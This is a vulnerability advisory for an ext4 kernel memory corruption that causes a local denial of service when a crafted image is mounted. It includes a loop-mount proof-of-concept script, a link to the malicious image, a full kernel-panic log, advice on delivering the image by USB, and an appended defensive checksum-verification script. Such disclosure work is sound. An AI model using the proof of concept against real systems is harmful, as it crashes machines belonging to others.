Linux Kernel EXT4 Memory Corruption / SLAB Out-Of-Bounds Read
OS-S Security Advisory 2016-22
Local DoS: Linux Kernel EXT4 Memory Corruption / SLAB-Out-of-Bounds Read

Date: October 31st, 2016
Authors: Sergej Schumilo, Ralf Spenneberg
CVE: Not yet assigned
CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
Severity: Critical
Ease of Exploitation: Trivial
Vulnerability Type: Memory Corruption / SLAB-Out-of-Bounds Read

Abstract:
Mounting a crafted EXT4 image read-only leads to a memory corruption and to SLAB-Out-of-Bounds Reads (according to KASAN). Since mounting is a privileged operation, an attacker is probably not able to trigger this vulnerability from the command line. Instead, the automatic mounting feature of the GUI, fed with a crafted USB device, is required.

Detailed product description:
We have verified the bug on the following kernel builds:
  Ubuntu Server 16.10 (GNU/Linux 4.8.0-22-generic x86_64)
  RedHat Kernel 3.10.0-327.18.2.el7.x86_64

Vendor Communication:
We contacted RedHat on May 3rd, 2016. To this day, no security patch has been provided by the vendor. We publish this Security Advisory in accordance with our responsible disclosure policy.

Reference: https://bugzilla.redhat.com/show_bug.cgi?id=1332503

Proof of Concept:
As a proof of concept, we are providing the image that causes the memory corruption / use-after-free. For demonstration purposes a script to mount this filesystem is also attached.

Severity and Ease of Exploitation:
The vulnerability can easily be exploited as a Denial-of-Service remotely by using a USB device. In this case the attacker must copy this image (e.g. using dd) to a device or storage medium such as an SD card, which can be set to read-only mode (using the write-protection switch).

Mount-Script:
  cp ext4_fs_file /tmp/
  mkdir /tmp/a
  losetup /dev/loop0 /tmp/ext4_fs_file
  mount -o ro /dev/loop0 /tmp/a

Malicious EXT4-Image: https://os-s.net/advisories/OSS-2016-22-image
KASAN-Report: https://os-s.net/advisories/OSS-2016-22-KASAN

dmesg-Report:
/ # ./mount.sh
[ 56.421839] EXT4-fs (loop0): ext4_check_descriptors: Checksum for group 0 failed (25303!=248)
[ 56.437702] BUG: unable to handle kernel paging request at ffff880016161000
[ 56.446533] IP: [<ffffffffc005aa6f>] ext4_calculate_overhead+0x29f/0x370 [ext4]
[ 56.454410] PGD 1fee067 PUD 1fef067 PMD 16160063 BAD
[ 56.461593] Oops: 000b [#1] SMP
[ 56.467235] Modules linked in: ext4(OE) mbcache(E) jbd2(E)
[ 56.476475] CPU: 0 PID: 145 Comm: mounter Tainted: G OE 4.6.0-rc6 #4
[ 56.486022] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
[ 56.503885] task: ffff88001ee33300 ti: ffff88001e850000 task.ti: ffff88001e850000
[ 56.514936] RIP: 0010:[<ffffffffc005aa6f>] [<ffffffffc005aa6f>] ext4_calculate_overhead+0x29f/0x370 [ext4]
[ 56.528848] RSP: 0018:ffff88001e853c38 EFLAGS: 00010297
[ 56.536256] RAX: 0000000032323200 RBX: ffff88001613c000 RCX: 0000000000000000
[ 56.546277] RDX: 0000000000128000 RSI: 0000000000128001 RDI: 0000000032323201
[ 56.556046] RBP: ffff88001e853c98 R08: ffff8800160b8400 R09: 0000000000000000
[ 56.565942] R10: ffff88001ee85000 R11: ffff88001ee84800 R12: ffff88001ee85000
[ 56.575833] R13: 0000000000000005 R14: 0000000000000000 R15: 0000000000000000
[ 56.587260] FS: 00007fc4e7e6f700(0000) GS:ffff88001e400000(0000) knlGS:0000000000000000
[ 56.597788] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 56.607823] CR2: ffff880016160b08 CR3: 000000000011b000 CR4: 00000000000006f0
[ 56.618769] Stack:
[ 56.622341] ffff88001ee85000 0000000000000000 0000000100000001 0000000000000000
[ 56.634376] 0000000000000001 ffff88001ee84800 0000000000001fff 0000000000000001
[ 56.645606] ffff8800160b8400 0000000000000000 ffff88001ee84800 ffff88001ee85000
[ 56.656883] Call Trace:
[ 56.660786] [<ffffffffc005c6c5>] ext4_fill_super+0x1b85/0x32c0 [ext4]
[ 56.669671] [<ffffffff81367579>] ? snprintf+0x39/0x40
[ 56.676400] [<ffffffff8120688b>] mount_bdev+0x17b/0x1b0
[ 56.682302] [<ffffffffc005ab40>] ? ext4_calculate_overhead+0x370/0x370 [ext4]
[ 56.694070] [<ffffffffc004c935>] ext4_mount+0x15/0x20 [ext4]
[ 56.701554] [<ffffffff812071b8>] mount_fs+0x38/0x160
[ 56.708763] [<ffffffff811a6245>] ? __alloc_percpu+0x15/0x20
[ 56.717214] [<ffffffff81222847>] vfs_kern_mount+0x67/0x110
[ 56.723703] [<ffffffff81224fe8>] do_mount+0x228/0xdc0
[ 56.731254] [<ffffffff811e4e01>] ? __kmalloc_track_caller+0x31/0x220
[ 56.741002] [<ffffffff811a0ab2>] ? memdup_user+0x42/0x70
[ 56.748223] [<ffffffff81225ea5>] SyS_mount+0x95/0xe0
[ 56.756591] [<ffffffff817b6176>] entry_SYSCALL_64_fastpath+0x1e/0xa8
[ 56.766191] Code: 4c 89 5d c8 89 55 b4 e8 c0 60 fd ff 85 c0 4c 8b 5d c8 0f 8e 46 ff ff ff 8b 55 b4 8d 3c 02 41 8b 4c 24 54 8d 72 01 d3 fa 48 63 d2 <48> 0f ab 13 39 fe 89 f2 75 e9 41 01 c5 e9 21 ff ff ff 49 8b 83
[ 56.800243] RIP [<ffffffffc005aa6f>] ext4_calculate_overhead+0x29f/0x370 [ext4]
[ 56.811328] RSP <ffff88001e853c38>
[ 56.816875] CR2: ffff880016161000
[ 56.821488] ---[ end trace 70027566e5b28840 ]---
[ 56.826472] BUG: unable to handle kernel paging request at ffff8800160b6100
[ 56.834290] IP: [<ffffffff810b4257>] task_tick_fair+0x4a7/0x980
[ 56.842839] PGD 1fee067 PUD 1fef067 PMD 16160063 BAD
[ 56.850310] Oops: 000b [#2] SMP
[ 56.856901] Modules linked in: ext4(OE) mbcache(E) jbd2(E)
[ 56.865616] CPU: 0 PID: 145 Comm: mounter Tainted: G D OE 4.6.0-rc6 #4
[ 56.875621] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
[ 56.892863] task: ffff88001ee33300 ti: ffff88001e850000 task.ti: ffff88001e850000
[ 56.902648] RIP: 0010:[<ffffffff810b4257>] [<ffffffff810b4257>] task_tick_fair+0x4a7/0x980
[ 56.914488] RSP: 0018:ffff88001e403dd0 EFLAGS: 00010002
[ 56.922043] RAX: fffffffffffffda2 RBX: ffff88001e87a000 RCX: 000000000000025e
[ 56.932215] RDX: 0000000000000019 RSI: ffff88001e416c40 RDI: ffff8800160b6000
[ 56.940606] RBP: ffff88001e403e48 R08: ffffffffffffffff R09: 0000000000000001
[ 56.952012] R10: 0000000000000000 R11: 0000000000000001 R12: 0000000000005e99
[ 56.961436] R13: 00000000000000f0 R14: ffff88001ee33380 R15: ffff88001e87a000
[ 56.968021] FS: 00007fc4e7e6f700(0000) GS:ffff88001e400000(0000) knlGS:0000000000000000
[ 56.980306] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 56.987740] CR2: ffff8800161605b0 CR3: 000000000011b000 CR4: 00000000000006f0
[ 56.995946] Stack:
[ 56.997897] 0000000000000000 ffff88001ee33300 ffff88001e416c40 0000000000005eaa
[ 57.007230] ffff880000000000 0000000000000400 ffff880000000000 ffff88001e416c40
[ 57.017866] 000000001e403e30 ffff88001ee33380 ffff88001e416c40 0000000000016c40
[ 57.024945] Call Trace:
[ 57.027693] <IRQ>
[ 57.030393] [<ffffffff810a643c>] scheduler_tick+0x5c/0xd0
[ 57.036102] [<ffffffff810f5060>] ? tick_sched_handle.isra.13+0x60/0x60
[ 57.043808] [<ffffffff810e5be1>] update_process_times+0x51/0x60
[ 57.050493] [<ffffffff810f5025>] tick_sched_handle.isra.13+0x25/0x60
[ 57.058897] [<ffffffff810f509d>] tick_sched_timer+0x3d/0x70
[ 57.065082] [<ffffffff810e6464>] __hrtimer_run_queues+0xe4/0x250
[ 57.070516] [<ffffffff810e6bd8>] hrtimer_interrupt+0xa8/0x1a0
[ 57.077781] [<ffffffff8104f948>] local_apic_timer_interrupt+0x38/0x60
[ 57.083346] [<ffffffff817b89ed>] smp_apic_timer_interrupt+0x3d/0x50
[ 57.091424] [<ffffffff817b6d62>] apic_timer_interrupt+0x82/0x90
[ 57.099326] <EOI>
[ 57.102170] [<ffffffff81102911>] ? acct_collect+0x171/0x1a0
[ 57.109009] [<ffffffff8107eb4b>] do_exit+0x4db/0xb10
[ 57.115915] [<ffffffff8102fa93>] oops_end+0xa3/0xd0
[ 57.122250] [<ffffffff810666b0>] no_context+0x110/0x370
[ 57.129398] [<ffffffff81066991>] __bad_area_nosemaphore+0x81/0x200
[ 57.138090] [<ffffffff81066b24>] bad_area_nosemaphore+0x14/0x20
[ 57.146376] [<ffffffff81066ec0>] __do_page_fault+0xc0/0x4c0
[ 57.153429] [<ffffffff811e0015>] ? new_slab+0x3b5/0x5d0
[ 57.163147] [<ffffffff81067327>] trace_do_page_fault+0x37/0xd0
[ 57.169386] [<ffffffff8105fa99>] do_async_page_fault+0x19/0x70
[ 57.174572] [<ffffffff817b8118>] async_page_fault+0x28/0x30
[ 57.181017] [<ffffffffc005aa6f>] ? ext4_calculate_overhead+0x29f/0x370 [ext4]
[ 57.188992] [<ffffffffc005aa50>] ? ext4_calculate_overhead+0x280/0x370 [ext4]
[ 57.196489] [<ffffffffc005c6c5>] ext4_fill_super+0x1b85/0x32c0 [ext4]
[ 57.205539] [<ffffffff81367579>] ? snprintf+0x39/0x40
[ 57.211646] [<ffffffff8120688b>] mount_bdev+0x17b/0x1b0
[ 57.218941] [<ffffffffc005ab40>] ? ext4_calculate_overhead+0x370/0x370 [ext4]
[ 57.228329] [<ffffffffc004c935>] ext4_mount+0x15/0x20 [ext4]
[ 57.234328] [<ffffffff812071b8>] mount_fs+0x38/0x160
[ 57.240946] [<ffffffff811a6245>] ? __alloc_percpu+0x15/0x20
[ 57.246275] [<ffffffff81222847>] vfs_kern_mount+0x67/0x110
[ 57.250890] [<ffffffff81224fe8>] do_mount+0x228/0xdc0
[ 57.255725] [<ffffffff811e4e01>] ? __kmalloc_track_caller+0x31/0x220
[ 57.261346] [<ffffffff811a0ab2>] ? memdup_user+0x42/0x70
[ 57.266554] [<ffffffff81225ea5>] SyS_mount+0x95/0xe0
[ 57.274193] [<ffffffff817b6176>] entry_SYSCALL_64_fastpath+0x1e/0xa8
[ 57.280765] Code: 8b bb e8 00 00 00 48 29 d0 48 81 ff 00 eb ee 81 74 2c 49 89 c0 48 c1 ea 06 49 c1 f8 3f 4c 89 c1 48 31 c1 4c 29 c1 48 39 d1 76 13 <3e> 48 01 87 00 01 00 00 48 8b 43 78 48 89 83 98 00 00 00 65 8b
[ 57.312620] RIP [<ffffffff810b4257>] task_tick_fair+0x4a7/0x980
[ 57.319317] RSP <ffff88001e403dd0>
[ 57.322494] CR2: ffff8800160b6100
[ 57.326972] ---[ end trace 70027566e5b28841 ]---
[ 57.333540] Kernel panic - not syncing: Fatal exception in interrupt
[ 57.346993] Kernel Offset: disabled
[ 57.350049] Rebooting in 1 seconds..

--
OpenSource Training Ralf Spenneberg
http://www.os-t.de
Am Bahnhof 3-5
48565 Steinfurt
Germany
Phone: +49(0)2552 638 755
Fax: +49(0)2552 638 757
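The first line of the kernel log above is the ext4 group descriptor checksum check failing ("Checksum for group 0 failed (25303!=248)"), after which the read-only mount carries on into ext4_calculate_overhead and crashes. A defender who wants to inspect or log removable media before anything is mounted (for example from a udisks or udev policy hook) therefore needs the same check outside the kernel. The script below is an added example written for this advisory, not the authors' proof-of-concept tooling or any kernel code; it re-implements the kernel's ext4_group_desc_csum() logic (crc16 over s_uuid, the group number and the descriptor for gdt_csum, crc32c with the superblock seed for metadata_csum) from the on-disk format, using standard superblock offsets. The 3 KiB sample image it builds is constructed for the demonstration and is deliberately not a mountable filesystem; the function and variable names are the example's own.

```python
import struct
import sys

# On-disk ext4 constants (fs/ext4/ext4.h); offsets below are into the 1024-byte superblock.
EXT4_SUPER_MAGIC = 0xEF53
RO_COMPAT_GDT_CSUM, RO_COMPAT_METADATA_CSUM = 0x0010, 0x0400
INCOMPAT_64BIT, INCOMPAT_CSUM_SEED = 0x0080, 0x2000
BG_CHECKSUM_OFFSET = 0x1E  # offsetof(struct ext4_group_desc, bg_checksum)
EXT4_MIN_DESC_SIZE = 32

def crc16(crc, data):
    """lib/crc16.c: CRC-16 with reflected polynomial 0xA001; the caller supplies the seed."""
    for b in data:
        crc ^= b
        for _ in range(8):
            crc = (crc >> 1) ^ 0xA001 if crc & 1 else crc >> 1
    return crc

def crc32c(crc, data):
    """Raw CRC-32C update (reflected 0x82F63B78), no pre/post inversion, as ext4_chksum() uses it."""
    for b in data:
        crc ^= b
        for _ in range(8):
            crc = (crc >> 1) ^ 0x82F63B78 if crc & 1 else crc >> 1
    return crc

def parse_superblock(img):
    """Extract the superblock fields the group-descriptor checksum depends on."""
    sb = img[1024:2048]
    if struct.unpack_from("<H", sb, 0x38)[0] != EXT4_SUPER_MAGIC:
        raise ValueError("no ext2/3/4 superblock magic at offset 1024")
    first_data_block, log_block_size, _, blocks_per_group = struct.unpack_from("<IIII", sb, 0x14)
    incompat, ro_compat = struct.unpack_from("<II", sb, 0x60)
    if blocks_per_group == 0 or log_block_size > 6:
        raise ValueError("implausible superblock geometry")  # hostile input: refuse, do not divide by zero
    blocks = struct.unpack_from("<I", sb, 0x04)[0]
    if incompat & INCOMPAT_64BIT:
        blocks |= struct.unpack_from("<I", sb, 0x150)[0] << 32
    uuid = bytes(sb[0x68:0x78])
    return {
        "uuid": uuid, "incompat": incompat, "ro_compat": ro_compat,
        "first_data_block": first_data_block, "block_size": 1024 << log_block_size,
        "desc_size": struct.unpack_from("<H", sb, 0xFE)[0] if incompat & INCOMPAT_64BIT else EXT4_MIN_DESC_SIZE,
        "groups": (blocks - first_data_block + blocks_per_group - 1) // blocks_per_group,
        # metadata_csum seed: s_checksum_seed when the csum_seed feature is set, else crc32c(~0, s_uuid)
        "csum_seed": struct.unpack_from("<I", sb, 0x270)[0] if incompat & INCOMPAT_CSUM_SEED else crc32c(0xFFFFFFFF, uuid),
    }

def group_desc_csum(info, group, gd):
    """Mirror of the kernel's ext4_group_desc_csum(): the value expected in bg_checksum."""
    le_group = struct.pack("<I", group)
    if info["ro_compat"] & RO_COMPAT_METADATA_CSUM:
        zeroed = gd[:BG_CHECKSUM_OFFSET] + b"\x00\x00" + gd[BG_CHECKSUM_OFFSET + 2:]
        return crc32c(crc32c(info["csum_seed"], le_group), zeroed) & 0xFFFF
    if not info["ro_compat"] & RO_COMPAT_GDT_CSUM:
        return 0
    crc = crc16(crc16(0xFFFF, info["uuid"]), le_group)
    crc = crc16(crc, gd[:BG_CHECKSUM_OFFSET])
    rest = BG_CHECKSUM_OFFSET + 2  # skip the checksum field itself
    if info["incompat"] & INCOMPAT_64BIT and rest < info["desc_size"]:
        crc = crc16(crc, gd[rest:info["desc_size"]])
    return crc

def verify_group_descriptors(img):
    """Return [(group, stored, expected), ...] for descriptors whose checksum does not verify."""
    info = parse_superblock(img)
    gdt = (info["first_data_block"] + 1) * info["block_size"]
    failures = []
    for g in range(info["groups"]):
        off = gdt + g * info["desc_size"]
        gd = bytes(img[off:off + info["desc_size"]])
        if len(gd) < info["desc_size"]:
            raise ValueError("group descriptor table runs past the end of the image")
        stored = struct.unpack_from("<H", gd, BG_CHECKSUM_OFFSET)[0]
        expected = group_desc_csum(info, g, gd)
        if stored != expected:
            failures.append((g, stored, expected))
    return failures

def build_sample_image(corrupt=False):
    # Constructed 3 KiB stand-in: 1K blocks, one block group, gdt_csum on. Not a mountable filesystem.
    sb = bytearray(1024)
    struct.pack_into("<I", sb, 0x04, 8192)                # s_blocks_count_lo
    struct.pack_into("<I", sb, 0x14, 1)                   # s_first_data_block (1 with 1K blocks)
    struct.pack_into("<I", sb, 0x20, 8192)                # s_blocks_per_group
    struct.pack_into("<H", sb, 0x38, EXT4_SUPER_MAGIC)
    struct.pack_into("<I", sb, 0x64, RO_COMPAT_GDT_CSUM)  # s_feature_ro_compat
    sb[0x68:0x78] = bytes(range(16))                      # constructed UUID
    img = bytearray(3 * 1024)
    img[1024:2048] = sb
    gd = bytearray(EXT4_MIN_DESC_SIZE)
    struct.pack_into("<III", gd, 0, 3, 4, 5)              # bg_block_bitmap, bg_inode_bitmap, bg_inode_table
    struct.pack_into("<H", gd, BG_CHECKSUM_OFFSET, group_desc_csum(parse_superblock(img), 0, bytes(gd)))
    if corrupt:
        gd[0] ^= 0x01                                     # one flipped descriptor bit, checksum left stale
    img[2048:2048 + EXT4_MIN_DESC_SIZE] = gd
    return bytes(img)

if __name__ == "__main__":
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_image(corrupt=True)
    for g, stored, expected in verify_group_descriptors(image):
        print("Checksum for group %u failed (%u!=%u)" % (g, stored, expected))
```

Run it with the path of a block device or image as its only argument; with no argument it checks the constructed sample and reports the mismatch in the same "(stored!=expected)" form the kernel message uses. A passing check is triage information, not an integrity guarantee: whoever writes an image can also write matching checksums, so the mitigation for this advisory remains disabling automatic mounting of removable media and applying the vendor fix once available.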